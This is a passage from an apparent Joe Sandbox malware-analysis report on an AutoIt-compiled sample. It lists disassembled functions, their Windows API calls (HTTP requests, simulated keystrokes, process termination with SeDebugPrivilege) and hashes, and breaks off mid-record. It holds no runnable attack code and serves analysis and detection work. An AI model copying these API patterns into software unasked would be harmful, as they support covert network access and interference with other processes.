                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LoadString$_wcslen
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 4099089115-2391861430
                                                  • Opcode ID: 7bfd976517392729e4a81deed20f8a75001d95de7d317fd8c2c15dfe98b0602a
                                                  • Instruction ID: 05ad303d813e93faf6c0e21812a2d95696c1df6a041cfdfdc0d5e40f3d24840d
                                                  • Opcode Fuzzy Hash: 7bfd976517392729e4a81deed20f8a75001d95de7d317fd8c2c15dfe98b0602a
                                                  • Instruction Fuzzy Hash: 9A51907184061ABBCF14EBA0CC46EEEBF7ABF54301F144129F505722A1EB711A99DFA0
                                                  Function 0060C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060C272
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060C29A
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060C2CA
                                                  • GetLastError.KERNEL32 ref: 0060C322
                                                  • SetEvent.KERNEL32(?), ref: 0060C336
                                                  • InternetCloseHandle.WININET(00000000), ref: 0060C341
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  • Opcode ID: 48c323302adde9d654d9e4dcc5494fcbab2696d58ca3f293f2fb9dcf94c6e899
                                                  • Instruction ID: 3c6e33701cd74974e28414366f7db78fd191359042d13de449db99c7dfd2b1e2
                                                  • Opcode Fuzzy Hash: 48c323302adde9d654d9e4dcc5494fcbab2696d58ca3f293f2fb9dcf94c6e899
                                                  • Instruction Fuzzy Hash: 32317FB1540604AFD7299FA48C88AAF7BFEEF49764F10861EF44692280DB34DD069B61
                                                  Function 005F989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005D3AAF,?,?,Bad directive syntax error,0062CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005F98BC
                                                  • LoadStringW.USER32(00000000,?,005D3AAF,?), ref: 005F98C3
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005F9987
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                  • API String ID: 858772685-4153970271
                                                  • Opcode ID: 84640d973935019f21ca0b89f0f91363214e8e307ac61ed155cb66ab359a2259
                                                  • Instruction ID: a02d2b4090a14fdc4dc148ce92862d1c559d54bfb97d6e649f986b9e9c9901a8
                                                  • Opcode Fuzzy Hash: 84640d973935019f21ca0b89f0f91363214e8e307ac61ed155cb66ab359a2259
                                                  • Instruction Fuzzy Hash: F321823184021EEBCF11AF90CC0AEFD7B7AFF54301F04446AF515620A1DB759618CB60
                                                  Function 005F209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32 ref: 005F20AB
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 005F20C0
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005F214D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1290815626-3381328864
                                                  • Opcode ID: e0a6e0bef081e0cf3345b49de694057c56188efb195d98af04d37a85aa9a1589
                                                  • Instruction ID: 3e8a6a97549bb92d44c89d57c9481e59c2617df07bf12c44ae45568ca9ff8f23
                                                  • Opcode Fuzzy Hash: e0a6e0bef081e0cf3345b49de694057c56188efb195d98af04d37a85aa9a1589
                                                  • Instruction Fuzzy Hash: 681120B658470BBAFA112220DC1FDF67F9DFF05325F210115FB05A50D2FE65A8469918
                                                  Function 005CCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                  • String ID:
                                                  • API String ID: 1282221369-0
                                                  • Opcode ID: e0c5ae96685104311a7a709806e0114e3013dbba9fd5d9b9cfd79cac92c2f227
                                                  • Instruction ID: 00cb99e5d7063f2d76ed7e163f96ee4ddb4bd3d865c2f4314233ee529a5ab18d
                                                  • Opcode Fuzzy Hash: e0c5ae96685104311a7a709806e0114e3013dbba9fd5d9b9cfd79cac92c2f227
                                                  • Instruction Fuzzy Hash: C561F771904302AFDB21AFF49889F6A7FA5FF45350F04417DF949E7241E6719D418760
                                                  Function 006250D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00625186
                                                  • ShowWindow.USER32(?,00000000), ref: 006251C7
                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 006251CD
                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006251D1
                                                    • Part of subcall function 00626FBA: DeleteObject.GDI32(00000000), ref: 00626FE6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0062520D
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0062521A
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0062524D
                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00625287
                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00625296
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                  • String ID:
                                                  • API String ID: 3210457359-0
                                                  • Opcode ID: fcbc535587be840e1cabe97f816aa737015e6fe59891751aeb0a86cccffc2fa3
                                                  • Instruction ID: 4084ac8c8047d28d98836a0c0d958f3366ff8e515479b42c84d190f3bd9760fe
                                                  • Opcode Fuzzy Hash: fcbc535587be840e1cabe97f816aa737015e6fe59891751aeb0a86cccffc2fa3
                                                  • Instruction Fuzzy Hash: 40519E30A51E29FEEF309F24EC49BD83B67AB05320F148011F6169A2E0C375AAA1DF51
                                                  Function 005A8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 005E6890
                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005E68A9
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005E68B9
                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005E68D1
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005E68F2
                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005A8874,00000000,00000000,00000000,000000FF,00000000), ref: 005E6901
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 005E691E
                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005A8874,00000000,00000000,00000000,000000FF,00000000), ref: 005E692D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                  • String ID:
                                                  • API String ID: 1268354404-0
                                                  • Opcode ID: eed6137a533d6f4509b385a131f24a0efd5f58fa9f7774ee0f3c311b0e859d2d
                                                  • Instruction ID: 5a2f068d9e1ed0a6af01962a65fbfcd634a05250471ec70a3857bf413d2e19f4
                                                  • Opcode Fuzzy Hash: eed6137a533d6f4509b385a131f24a0efd5f58fa9f7774ee0f3c311b0e859d2d
                                                  • Instruction Fuzzy Hash: BC51A870600609EFDB24CF25CC55BAE3BB6FB993A0F104528F952D72A0DB70E990CB60
                                                  Function 0060C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060C182
                                                  • GetLastError.KERNEL32 ref: 0060C195
                                                  • SetEvent.KERNEL32(?), ref: 0060C1A9
                                                    • Part of subcall function 0060C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060C272
                                                    • Part of subcall function 0060C253: GetLastError.KERNEL32 ref: 0060C322
                                                    • Part of subcall function 0060C253: SetEvent.KERNEL32(?), ref: 0060C336
                                                    • Part of subcall function 0060C253: InternetCloseHandle.WININET(00000000), ref: 0060C341
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 337547030-0
                                                  • Opcode ID: 281af09ec58bb8cffeee9703ee35ada293ad3fd071963a6a2e64a779c96c0471
                                                  • Instruction ID: 23497f1c5202d8329be67569b6d0356abcdc4b5dc2fc8ceb05c914a1797a2054
                                                  • Opcode Fuzzy Hash: 281af09ec58bb8cffeee9703ee35ada293ad3fd071963a6a2e64a779c96c0471
                                                  • Instruction Fuzzy Hash: 3831A171540A01FFDB299FE5DD04AABBBFAFF18320B00461DF95683A50C730E9159BA0
                                                  Function 005F25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                                                    • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                                                    • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F25BD
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005F25DB
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005F25DF
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F25E9
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005F2601
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 005F2605
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F260F
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005F2623
                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 005F2627
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: a5c8c79ec543db0acf86ff79a180e896d730fc73676d36da0eed9c0c6192b670
                                                  • Instruction ID: 605b3e619a0742918cf674f9ffcb661bc048a4aff68a4fcb4e6b90e3cc3f3396
                                                  • Opcode Fuzzy Hash: a5c8c79ec543db0acf86ff79a180e896d730fc73676d36da0eed9c0c6192b670
                                                  • Instruction Fuzzy Hash: CE01D830390A14BBFB206769DC8EF693F5AEF8EB21F101001F354AE0D1C9E214459A69
                                                  Function 005F1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,005F1449,?,?,00000000), ref: 005F180C
                                                  • HeapAlloc.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F1813
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1449,?,?,00000000), ref: 005F1828
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,005F1449,?,?,00000000), ref: 005F1830
                                                  • DuplicateHandle.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F1833
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1449,?,?,00000000), ref: 005F1843
                                                  • GetCurrentProcess.KERNEL32(005F1449,00000000,?,005F1449,?,?,00000000), ref: 005F184B
                                                  • DuplicateHandle.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F184E
                                                  • CreateThread.KERNEL32(00000000,00000000,005F1874,00000000,00000000,00000000), ref: 005F1868
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: 7385525b5f54878027fb158839642a460dbfc64f7232a5c11fef27256d8df0ec
                                                  • Instruction ID: f321819fd9f2649c3ddee2a9981cfa2104659c4521c739a58f8e159019b65ee0
                                                  • Opcode Fuzzy Hash: 7385525b5f54878027fb158839642a460dbfc64f7232a5c11fef27256d8df0ec
                                                  • Instruction Fuzzy Hash: 3E01FBB5240708BFE720ABA5DC4EF6B3BADEB89B10F104410FA04DB1A1CA709811CB60
                                                  Function 0061A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005FD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 005FD501
                                                    • Part of subcall function 005FD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 005FD50F
                                                    • Part of subcall function 005FD4DC: CloseHandle.KERNEL32(00000000), ref: 005FD5DC
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061A16D
                                                  • GetLastError.KERNEL32 ref: 0061A180
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061A1B3
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0061A268
                                                  • GetLastError.KERNEL32(00000000), ref: 0061A273
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061A2C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: b0c311e56351f8a79c8a77403bb83b18b2d4fd96bd07bdeed7de2a17bb4e3080
                                                  • Instruction ID: 6182033c2fa9e0d21a04800780062a196fb2e2e863b4f23503bfc3036a10ba52
                                                  • Opcode Fuzzy Hash: b0c311e56351f8a79c8a77403bb83b18b2d4fd96bd07bdeed7de2a17bb4e3080
                                                  • Instruction Fuzzy Hash: AB61E430205242AFD720DF54C499FA9BBE2BF44318F18848CE4568B793C772ED85CB82
                                                  Function 00623886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00623925
                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0062393A
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00623954
                                                  • _wcslen.LIBCMT ref: 00623999
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 006239C6
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006239F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcslen
                                                  • String ID: SysListView32
                                                  • API String ID: 2147712094-78025650
                                                  • Opcode ID: a05e87c0039257786a546c8b9e2aea8d5add94c2d247c772a5923bd42113fffd
                                                  • Instruction ID: c0e07875f4ac82c3237f64c355e0575edc3202e9e0484e117948688de275309f
                                                  • Opcode Fuzzy Hash: a05e87c0039257786a546c8b9e2aea8d5add94c2d247c772a5923bd42113fffd
                                                  • Instruction Fuzzy Hash: BD41C571A00629ABDF219F64DC49BEE7BAAFF48350F100526F948E7381D7759984CF90
                                                  Function 005FBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FBCFD
                                                  • IsMenu.USER32(00000000), ref: 005FBD1D
                                                  • CreatePopupMenu.USER32 ref: 005FBD53
                                                  • GetMenuItemCount.USER32(01634670), ref: 005FBDA4
                                                  • InsertMenuItemW.USER32(01634670,?,00000001,00000030), ref: 005FBDCC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
